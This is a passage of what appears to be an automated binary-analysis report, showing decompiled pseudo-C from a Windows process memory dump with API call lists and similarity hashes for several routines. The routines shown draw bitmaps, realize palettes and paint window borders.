                                                                                				void* _t254;
                                                                                				struct HDC__* _t273;
                                                                                				struct HDC__* _t287;
                                                                                				void* _t327;
                                                                                				void* _t348;
                                                                                				void* _t365;
                                                                                				void* _t372;
                                                                                				intOrPtr _t387;
                                                                                				intOrPtr _t393;
                                                                                				struct HDC__* _t397;
                                                                                				struct HDC__* _t398;
                                                                                				struct HDC__* _t399;
                                                                                				void* _t426;
                                                                                				void* _t427;
                                                                                				void* _t428;
                                                                                				intOrPtr _t452;
                                                                                				intOrPtr _t469;
                                                                                				void* _t483;
                                                                                				int _t491;
                                                                                				int _t496;
                                                                                				void* _t498;
                                                                                				void* _t500;
                                                                                				intOrPtr _t501;
                                                                                				void* _t511;
                                                                                
                                                                                				_t498 = _t500;
                                                                                				_t501 = _t500 + 0xffffffc8;
                                                                                				_v9 = __edx;
                                                                                				_v8 = __eax;
                                                                                				if(_v9 == 2 &&  *(_v8 + 0x20) < 3) {
                                                                                					_v9 = 0;
                                                                                				}
                                                                                				_t393 =  *((intOrPtr*)(_v8 + 0xc));
                                                                                				if(_t393 != 0xffffffff) {
                                                                                					L24:
                                                                                					return _t393;
                                                                                				} else {
                                                                                					_t170 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
                                                                                					if((_t170 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))()) == 0) {
                                                                                						goto L24;
                                                                                					} else {
                                                                                						_t176 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
                                                                                						asm("cdq");
                                                                                						_t491 = _t176 / ( *(_v8 + 0x20) & 0x000000ff);
                                                                                						_t496 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))();
                                                                                						if( *((intOrPtr*)(_v8 + 8)) == 0) {
                                                                                							_t508 =  *0x46bc88;
                                                                                							if( *0x46bc88 == 0) {
                                                                                								 *0x46bc88 = E00466170(1);
                                                                                							}
                                                                                							_t387 =  *0x46bc88; // 0x0
                                                                                							 *((intOrPtr*)(_v8 + 8)) = E004661E4(_t387, _t496, _t491);
                                                                                						}
                                                                                						_v16 = E00423960(1);
                                                                                						 *[fs:eax] = _t501;
                                                                                						 *((intOrPtr*)( *_v16 + 0x40))( *[fs:eax], 0x466a2b, _t498);
                                                                                						 *((intOrPtr*)( *_v16 + 0x34))();
                                                                                						E00412984(0, _t491, 0,  &_v44, _t496);
                                                                                						E0041F338( *((intOrPtr*)(E00423F28(_v16) + 0x14)), _t491, 0x8000000f, _t491, _t498, _t508);
                                                                                						E004236F0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x24))());
                                                                                						 *((intOrPtr*)( *_v16 + 0x38))();
                                                                                						if(_v9 >=  *(_v8 + 0x20)) {
                                                                                						}
                                                                                						E00412984(0 * _t491, 1 * _t491, 0,  &_v60, _t496);
                                                                                						_t209 = _v9 - 1;
                                                                                						_t511 = _t209;
                                                                                						if(_t511 < 0) {
                                                                                							L14:
                                                                                							_push( &_v60);
                                                                                							_t213 = E00423F28( *((intOrPtr*)(_v8 + 4)));
                                                                                							E0041F868(E00423F28(_v16),  &_v44, _t512, _t213);
                                                                                							_t218 =  *((intOrPtr*)(_v8 + 4));
                                                                                							_t513 =  *((char*)(_t218 + 0x38)) - 1;
                                                                                							if( *((char*)(_t218 + 0x38)) != 1) {
                                                                                								 *((intOrPtr*)(_v8 + 0xc)) = E00466114( *((intOrPtr*)(_v8 + 8)), 0x20000000, _v16, __eflags);
                                                                                							} else {
                                                                                								 *((intOrPtr*)(_v8 + 0xc)) = E00466114( *((intOrPtr*)(_v8 + 8)),  *((intOrPtr*)(_v8 + 0x1c)), _v16, _t513);
                                                                                							}
                                                                                							goto L23;
                                                                                						} else {
                                                                                							if(_t511 == 0) {
                                                                                								_v24 = 0;
                                                                                								_v20 = 0;
                                                                                								 *[fs:eax] = _t501;
                                                                                								_v24 = E00423960(1);
                                                                                								_v20 = E00423960(1);
                                                                                								 *((intOrPtr*)( *_v20 + 8))( *[fs:eax], 0x4669ef, _t498);
                                                                                								 *((intOrPtr*)( *_v20 + 0x6c))();
                                                                                								_t241 = _v8;
                                                                                								__eflags =  *((char*)(_t241 + 0x20)) - 1;
                                                                                								if( *((char*)(_t241 + 0x20)) <= 1) {
                                                                                									 *((intOrPtr*)( *_v24 + 8))();
                                                                                									 *((intOrPtr*)( *_v24 + 0x6c))();
                                                                                									E0041F338( *((intOrPtr*)(E00423F28(_v24) + 0x14)),  *_v24, 0, _t491, _t498, __eflags);
                                                                                									_t420 =  *_v24;
                                                                                									 *((intOrPtr*)( *_v24 + 0x40))();
                                                                                									_t254 = E00423FE4(_v24);
                                                                                									__eflags = _t254;
                                                                                									if(_t254 != 0) {
                                                                                										E0041EB4C( *((intOrPtr*)(E00423F28(_v24) + 0xc)), 0xffffff);
                                                                                										__eflags = 0;
                                                                                										E00424D78(_v24, 0);
                                                                                										E0041F338( *((intOrPtr*)(E00423F28(_v24) + 0x14)), _t420, 0xffffff, _t491, _t498, __eflags);
                                                                                									}
                                                                                									E00424D78(_v24, 1);
                                                                                									_t396 = E00423F28(_v16);
                                                                                									E0041F338( *((intOrPtr*)(_t258 + 0x14)), _t420, 0x8000000f, _t491, _t498, __eflags);
                                                                                									E0041F9D0(_t258,  &_v44);
                                                                                									E0041F338( *((intOrPtr*)(_t258 + 0x14)), _t420, 0x80000014, _t491, _t498, __eflags);
                                                                                									SetTextColor(E0041FDC4(_t396), 0);
                                                                                									SetBkColor(E0041FDC4(_t396), 0xffffff);
                                                                                									_t273 = E0041FDC4(E00423F28(_v24));
                                                                                									BitBlt(E0041FDC4(_t396), 1, 1, _t491, _t496, _t273, 0, 0, 0xe20746);
                                                                                									E0041F338( *((intOrPtr*)(_t396 + 0x14)), _t420, 0x80000010, _t491, _t498, __eflags);
                                                                                									SetTextColor(E0041FDC4(_t396), 0);
                                                                                									SetBkColor(E0041FDC4(_t396), 0xffffff);
                                                                                									_t287 = E0041FDC4(E00423F28(_v24));
                                                                                									BitBlt(E0041FDC4(_t396), 0, 0, _t491, _t496, _t287, 0, 0, 0xe20746);
                                                                                								} else {
                                                                                									_v28 = E00423F28(_v16);
                                                                                									E00423F28(_v20);
                                                                                									E0041F868(_v28,  &_v44, __eflags,  &_v60);
                                                                                									E00424D78(_v24, 1);
                                                                                									 *((intOrPtr*)( *_v24 + 0x40))();
                                                                                									 *((intOrPtr*)( *_v24 + 0x34))();
                                                                                									E0041F338( *((intOrPtr*)(E00423F28(_v20) + 0x14)),  *_v24, 0xffffff, _t491, _t498, __eflags);
                                                                                									_push( &_v60);
                                                                                									_push(E00423F28(_v20));
                                                                                									_t327 = E00423F28(_v24);
                                                                                									_pop(_t426);
                                                                                									E0041F868(_t327,  &_v44, __eflags);
                                                                                									E0041F338( *((intOrPtr*)(_v28 + 0x14)), _t426, 0x80000014, _t491, _t498, __eflags);
                                                                                									_t397 = E0041FDC4(_v28);
                                                                                									SetTextColor(_t397, 0);
                                                                                									SetBkColor(_t397, 0xffffff);
                                                                                									BitBlt(_t397, 0, 0, _t491, _t496, E0041FDC4(E00423F28(_v24)), 0, 0, 0xe20746);
                                                                                									E0041F338( *((intOrPtr*)(E00423F28(_v20) + 0x14)), _t426, 0x808080, _t491, _t498, __eflags);
                                                                                									_push( &_v60);
                                                                                									_push(E00423F28(_v20));
                                                                                									_t348 = E00423F28(_v24);
                                                                                									_pop(_t427);
                                                                                									E0041F868(_t348,  &_v44, __eflags);
                                                                                									E0041F338( *((intOrPtr*)(_v28 + 0x14)), _t427, 0x80000010, _t491, _t498, __eflags);
                                                                                									_t398 = E0041FDC4(_v28);
                                                                                									SetTextColor(_t398, 0);
                                                                                									SetBkColor(_t398, 0xffffff);
                                                                                									BitBlt(_t398, 0, 0, _t491, _t496, E0041FDC4(E00423F28(_v24)), 0, 0, 0xe20746);
                                                                                									_push(E0041E68C( *((intOrPtr*)(_v8 + 0x1c))));
                                                                                									_t365 = E00423F28(_v20);
                                                                                									_pop(_t483);
                                                                                									E0041F338( *((intOrPtr*)(_t365 + 0x14)), _t427, _t483, _t491, _t498, __eflags);
                                                                                									_push( &_v60);
                                                                                									_push(E00423F28(_v20));
                                                                                									_t372 = E00423F28(_v24);
                                                                                									_pop(_t428);
                                                                                									E0041F868(_t372,  &_v44, __eflags);
                                                                                									E0041F338( *((intOrPtr*)(_v28 + 0x14)), _t428, 0x8000000f, _t491, _t498, __eflags);
                                                                                									_t399 = E0041FDC4(_v28);
                                                                                									SetTextColor(_t399, 0);
                                                                                									SetBkColor(_t399, 0xffffff);
                                                                                									BitBlt(_t399, 0, 0, _t491, _t496, E0041FDC4(E00423F28(_v24)), 0, 0, 0xe20746);
                                                                                								}
                                                                                								__eflags = 0;
                                                                                								_pop(_t469);
                                                                                								 *[fs:eax] = _t469;
                                                                                								_push(0x4669f6);
                                                                                								E004035B4(_v20);
                                                                                								return E004035B4(_v24);
                                                                                							} else {
                                                                                								_t512 = _t209 - 0xffffffffffffffff;
                                                                                								if(_t209 - 0xffffffffffffffff < 0) {
                                                                                									goto L14;
                                                                                								}
                                                                                								L23:
                                                                                								_pop(_t452);
                                                                                								 *[fs:eax] = _t452;
                                                                                								_push(0x466a32);
                                                                                								return E004035B4(_v16);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                			}


                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a9f24f81a7d116526757999156be1767d0915e43dcdf6f836040968d95a88aa2
                                                                                • Instruction ID: b98e89a6adbca2397a49e089f3fa7ccc612caa931b427b032da4384d08e47561
                                                                                • Opcode Fuzzy Hash: a9f24f81a7d116526757999156be1767d0915e43dcdf6f836040968d95a88aa2
                                                                                • Instruction Fuzzy Hash: 0B026070B00214AFC700EFA9D982E9EB7F5EF49315F51446AF801BB392DA78ED458B25
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 78%
                                                                                			E00423C58(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _v8;
                                                                                				struct HPALETTE__* _v12;
                                                                                				char _v13;
                                                                                				struct tagPOINT _v21;
                                                                                				struct HDC__* _v28;
                                                                                				void* _v32;
                                                                                				struct HPALETTE__* _t74;
                                                                                				signed int _t80;
                                                                                				signed int _t81;
                                                                                				char _t82;
                                                                                				void* _t89;
                                                                                				void* _t135;
                                                                                				intOrPtr* _t165;
                                                                                				intOrPtr _t173;
                                                                                				signed int _t174;
                                                                                				intOrPtr _t177;
                                                                                				intOrPtr _t179;
                                                                                				intOrPtr _t181;
                                                                                				int* _t185;
                                                                                				intOrPtr _t187;
                                                                                				void* _t189;
                                                                                				void* _t190;
                                                                                				intOrPtr _t191;
                                                                                
                                                                                				_t166 = __ecx;
                                                                                				_t189 = _t190;
                                                                                				_t191 = _t190 + 0xffffffe4;
                                                                                				_t185 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t165 = __eax;
                                                                                				_t187 =  *((intOrPtr*)(__eax + 0x28));
                                                                                				_t173 =  *0x423ea4; // 0xf
                                                                                				E0041FE98(_v8, __ecx, _t173);
                                                                                				E004242C8(_t165);
                                                                                				_v12 = 0;
                                                                                				_v13 = 0;
                                                                                				_t74 =  *(_t187 + 0x10);
                                                                                				if(_t74 != 0) {
                                                                                					_v12 = SelectPalette( *(_v8 + 4), _t74, 0xffffffff);
                                                                                					RealizePalette( *(_v8 + 4));
                                                                                					_v13 = 1;
                                                                                				}
                                                                                				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
                                                                                				_t80 = GetDeviceCaps( *(_v8 + 4), 0xe);
                                                                                				_pop(_t174);
                                                                                				_t81 = _t174 * _t80;
                                                                                				if(_t81 > 8) {
                                                                                					L4:
                                                                                					_t82 = 0;
                                                                                				} else {
                                                                                					_t166 =  *(_t187 + 0x28) & 0x0000ffff;
                                                                                					if(_t81 < ( *(_t187 + 0x2a) & 0x0000ffff) * ( *(_t187 + 0x28) & 0x0000ffff)) {
                                                                                						_t82 = 1;
                                                                                					} else {
                                                                                						goto L4;
                                                                                					}
                                                                                				}
                                                                                				if(_t82 == 0) {
                                                                                					if(E00423FE4(_t165) == 0) {
                                                                                						SetStretchBltMode(E0041FDC4(_v8), 3);
                                                                                					}
                                                                                				} else {
                                                                                					GetBrushOrgEx( *(_v8 + 4),  &_v21);
                                                                                					SetStretchBltMode( *(_v8 + 4), 4);
                                                                                					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
                                                                                				}
                                                                                				_push(_t189);
                                                                                				_push(0x423e95);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t191;
                                                                                				if( *((intOrPtr*)( *_t165 + 0x28))() != 0) {
                                                                                					E00424268(_t165, _t166);
                                                                                				}
                                                                                				_t89 = E00423F28(_t165);
                                                                                				_t177 =  *0x423ea4; // 0xf
                                                                                				E0041FE98(_t89, _t166, _t177);
                                                                                				if( *((intOrPtr*)( *_t165 + 0x28))() == 0) {
                                                                                					StretchBlt( *(_v8 + 4),  *_t185, _t185[1], _t185[2] -  *_t185, _t185[3] - _t185[1],  *(E00423F28(_t165) + 4), 0, 0,  *(_t187 + 0x1c),  *(_t187 + 0x20),  *(_v8 + 0x20));
                                                                                					_pop(_t179);
                                                                                					 *[fs:eax] = _t179;
                                                                                					_push(E00423E9C);
                                                                                					if(_v13 != 0) {
                                                                                						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
                                                                                					}
                                                                                					return 0;
                                                                                				} else {
                                                                                					_v32 = 0;
                                                                                					_v28 = 0;
                                                                                					_push(_t189);
                                                                                					_push(0x423e2a);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t191;
                                                                                					_v28 = E004201BC(CreateCompatibleDC(0));
                                                                                					_v32 = SelectObject(_v28,  *(_t187 + 0xc));
                                                                                					E00420360( *(_v8 + 4), _t165, _t185[1],  *_t185, _t185, _t187, 0, 0, _v28,  *(_t187 + 0x20),  *(_t187 + 0x1c), 0, 0,  *(E00423F28(_t165) + 4), _t185[3] - _t185[1], _t185[2] -  *_t185);
                                                                                					_t135 = 0;
                                                                                					_pop(_t181);
                                                                                					 *[fs:eax] = _t181;
                                                                                					_push(0x423e6f);
                                                                                					if(_v32 != 0) {
                                                                                						_t135 = SelectObject(_v28, _v32);
                                                                                					}
                                                                                					if(_v28 != 0) {
                                                                                						return DeleteDC(_v28);
                                                                                					}
                                                                                					return _t135;
                                                                                				}
                                                                                			}



























                                                                                APIs
                                                                                  • Part of subcall function 004242C8: GetDC.USER32(00000000), ref: 0042431E
                                                                                  • Part of subcall function 004242C8: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424333
                                                                                  • Part of subcall function 004242C8: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042433D
                                                                                  • Part of subcall function 004242C8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424361
                                                                                  • Part of subcall function 004242C8: ReleaseDC.USER32 ref: 0042436C
                                                                                • SelectPalette.GDI32(?,?,000000FF), ref: 00423C9A
                                                                                • RealizePalette.GDI32(?), ref: 00423CA9
                                                                                • GetDeviceCaps.GDI32(?,0000000C), ref: 00423CBB
                                                                                • GetDeviceCaps.GDI32(?,0000000E), ref: 00423CCA
                                                                                • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00423CFE
                                                                                • SetStretchBltMode.GDI32(?,00000004), ref: 00423D0C
                                                                                • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00423D24
                                                                                • SetStretchBltMode.GDI32(00000000,00000003), ref: 00423D41
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00423DA1
                                                                                • SelectObject.GDI32(?,?), ref: 00423DB6
                                                                                • SelectObject.GDI32(?,00000000), ref: 00423E15
                                                                                • DeleteDC.GDI32(00000000), ref: 00423E24
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
                                                                                • String ID:
                                                                                • API String ID: 2414602066-0
                                                                                • Opcode ID: c906eeb68a737587ac24b36a487ec7e1650cf8504f70cfbd4d93897cd3cdeefb
                                                                                • Instruction ID: 930dc268f662767776c74af4ca258a037dfb2cb6be22551be327afb4fc9958b1
                                                                                • Opcode Fuzzy Hash: c906eeb68a737587ac24b36a487ec7e1650cf8504f70cfbd4d93897cd3cdeefb
                                                                                • Instruction Fuzzy Hash: C67148B5B00215AFDB00EFA9D985F5EB7F8AF09304F51856AF508EB281D638EE44CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E004201CC(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                                                				void* _v8;
                                                                                				int _v12;
                                                                                				int _v16;
                                                                                				struct HBITMAP__* _v20;
                                                                                				struct HDC__* _v24;
                                                                                				struct HDC__* _v28;
                                                                                				struct HDC__* _v32;
                                                                                				int _v48;
                                                                                				int _v52;
                                                                                				void _v56;
                                                                                				void* _t78;
                                                                                				intOrPtr _t85;
                                                                                				intOrPtr _t86;
                                                                                				void* _t91;
                                                                                				void* _t93;
                                                                                				void* _t94;
                                                                                				intOrPtr _t95;
                                                                                
                                                                                				_t93 = _t94;
                                                                                				_t95 = _t94 + 0xffffffcc;
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				_t77 = __ecx;
                                                                                				_v8 = __eax;
                                                                                				_v28 = CreateCompatibleDC(0);
                                                                                				_v32 = CreateCompatibleDC(0);
                                                                                				_push(_t93);
                                                                                				_push(0x42031a);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t95;
                                                                                				GetObjectA(_v8, 0x18,  &_v56);
                                                                                				if(__ecx == 0) {
                                                                                					_v24 = GetDC(0);
                                                                                					if(_v24 == 0) {
                                                                                						E00420114(_t77);
                                                                                					}
                                                                                					_push(_t93);
                                                                                					_push(0x420289);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t95;
                                                                                					_v20 = CreateCompatibleBitmap(_v24, _v16, _v12);
                                                                                					if(_v20 == 0) {
                                                                                						E00420114(_t77);
                                                                                					}
                                                                                					_pop(_t85);
                                                                                					 *[fs:eax] = _t85;
                                                                                					_push(0x420290);
                                                                                					return ReleaseDC(0, _v24);
                                                                                				} else {
                                                                                					_v20 = CreateBitmap(_v16, _v12, 1, 1, 0);
                                                                                					if(_v20 != 0) {
                                                                                						_t78 = SelectObject(_v28, _v8);
                                                                                						_t91 = SelectObject(_v32, _v20);
                                                                                						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
                                                                                						if(_t78 != 0) {
                                                                                							SelectObject(_v28, _t78);
                                                                                						}
                                                                                						if(_t91 != 0) {
                                                                                							SelectObject(_v32, _t91);
                                                                                						}
                                                                                					}
                                                                                					_pop(_t86);
                                                                                					 *[fs:eax] = _t86;
                                                                                					_push(E00420321);
                                                                                					DeleteDC(_v28);
                                                                                					return DeleteDC(_v32);
                                                                                				}
                                                                                			}





















                                                                                APIs
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 004201E3
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 004201ED
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 0042020D
                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00420224
                                                                                • GetDC.USER32(00000000), ref: 00420230
                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0042025D
                                                                                • ReleaseDC.USER32 ref: 00420283
                                                                                • SelectObject.GDI32(?,?), ref: 0042029E
                                                                                • SelectObject.GDI32(?,00000000), ref: 004202AD
                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 004202D9
                                                                                • SelectObject.GDI32(?,00000000), ref: 004202E7
                                                                                • SelectObject.GDI32(?,00000000), ref: 004202F5
                                                                                • DeleteDC.GDI32(?), ref: 0042030B
                                                                                • DeleteDC.GDI32(?), ref: 00420314
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                • String ID:
                                                                                • API String ID: 644427674-0
                                                                                • Opcode ID: def52988ccf9f29a98a0ce8aab8240d9a233bbc5dca25520826afe0c81d20552
                                                                                • Instruction ID: 7d38c530bc7270683e9fe1384592e284e1f201ef5219feca1b4d3c6428f362da
                                                                                • Opcode Fuzzy Hash: def52988ccf9f29a98a0ce8aab8240d9a233bbc5dca25520826afe0c81d20552
                                                                                • Instruction Fuzzy Hash: 5F410AB1B40219AFDB00EAE9D846FAFB7FCEB09704F514466F615F7281C6786D108B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 52%
                                                                                			E0043CB6C(intOrPtr* __eax, intOrPtr __edx) {
                                                                                				intOrPtr* _v8;
                                                                                				intOrPtr _v12;
                                                                                				struct HDC__* _v16;
                                                                                				struct tagRECT _v32;
                                                                                				struct tagRECT _v48;
                                                                                				void* _v64;
                                                                                				intOrPtr* _t190;
                                                                                				intOrPtr* _t193;
                                                                                				void* _t202;
                                                                                				intOrPtr _t209;
                                                                                				signed int _t226;
                                                                                				void* _t229;
                                                                                				void* _t231;
                                                                                				intOrPtr _t232;
                                                                                
                                                                                				_t229 = _t231;
                                                                                				_t232 = _t231 + 0xffffffc4;
                                                                                				_v12 = __edx;
                                                                                				_v8 = __eax;
                                                                                				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
                                                                                					_v16 = GetWindowDC(E0043BD14(_v8));
                                                                                					_push(_t229);
                                                                                					_push(0x43cdd2);
                                                                                					_push( *[fs:edx]);
                                                                                					 *[fs:edx] = _t232;
                                                                                					GetClientRect(E0043BD14(_v8),  &_v32);
                                                                                					GetWindowRect(E0043BD14(_v8),  &_v48);
                                                                                					MapWindowPoints(0, E0043BD14(_v8),  &_v48, 2);
                                                                                					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
                                                                                					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					if( *(_v8 + 0x165) != 0) {
                                                                                						_t202 = 0;
                                                                                						if( *(_v8 + 0x163) != 0) {
                                                                                							_t202 = 0 +  *((intOrPtr*)(_v8 + 0x168));
                                                                                						}
                                                                                						if( *(_v8 + 0x164) != 0) {
                                                                                							_t202 = _t202 +  *((intOrPtr*)(_v8 + 0x168));
                                                                                						}
                                                                                						_t226 = GetWindowLongA(E0043BD14(_v8), 0xfffffff0);
                                                                                						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
                                                                                							_v48.left = _v48.left - _t202;
                                                                                						}
                                                                                						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
                                                                                							_v48.top = _v48.top - _t202;
                                                                                						}
                                                                                						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
                                                                                							_v48.right = _v48.right + _t202;
                                                                                						}
                                                                                						if((_t226 & 0x00200000) != 0) {
                                                                                							_t193 =  *0x486b30; // 0x487a94
                                                                                							_v48.right = _v48.right +  *((intOrPtr*)( *_t193))(0x14);
                                                                                						}
                                                                                						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
                                                                                							_v48.bottom = _v48.bottom + _t202;
                                                                                						}
                                                                                						if((_t226 & 0x00100000) != 0) {
                                                                                							_t190 =  *0x486b30; // 0x487a94
                                                                                							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t190))(0x15);
                                                                                						}
                                                                                						DrawEdge(_v16,  &_v48,  *(0x46b99c + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x46b9ac + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x46b9bc + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x46b9cc + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
                                                                                					}
                                                                                					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
                                                                                					FillRect(_v16,  &_v48, E0041F36C( *((intOrPtr*)(_v8 + 0x170))));
                                                                                					_pop(_t209);
                                                                                					 *[fs:eax] = _t209;
                                                                                					_push(0x43cdd9);
                                                                                					return ReleaseDC(E0043BD14(_v8), _v16);
                                                                                				} else {
                                                                                					return  *((intOrPtr*)( *_v8 - 0x10))();
                                                                                				}
                                                                                			}


















                                                                                APIs
                                                                                • GetWindowDC.USER32(00000000), ref: 0043CBA0
                                                                                • GetClientRect.USER32 ref: 0043CBC3
                                                                                • GetWindowRect.USER32 ref: 0043CBD5
                                                                                • MapWindowPoints.USER32 ref: 0043CBEB
                                                                                • OffsetRect.USER32(?,?,?), ref: 0043CC00
                                                                                • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 0043CC19
                                                                                • InflateRect.USER32(?,00000000,00000000), ref: 0043CC37
                                                                                • GetWindowLongA.USER32 ref: 0043CC8D
                                                                                • DrawEdge.USER32(?,?,00000000,00000008), ref: 0043CD59
                                                                                • IntersectClipRect.GDI32(?,?,?,?,?), ref: 0043CD72
                                                                                • OffsetRect.USER32(?,?,?), ref: 0043CD91
                                                                                • FillRect.USER32 ref: 0043CDAD
                                                                                • ReleaseDC.USER32 ref: 0043CDCC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Rect$Window$ClipOffset$ClientDrawEdgeExcludeFillInflateIntersectLongPointsRelease
                                                                                • String ID:
                                                                                • API String ID: 3115931838-0
                                                                                • Opcode ID: aac0cf2e32b499766f63477c942ff39a3e6c89f4748efe3072f24333a8105011
                                                                                • Instruction ID: 87f5691973d99f2f36ea90999ad42d0aa71137b0dd96603b0bfef02937046dfa
                                                                                • Opcode Fuzzy Hash: aac0cf2e32b499766f63477c942ff39a3e6c89f4748efe3072f24333a8105011
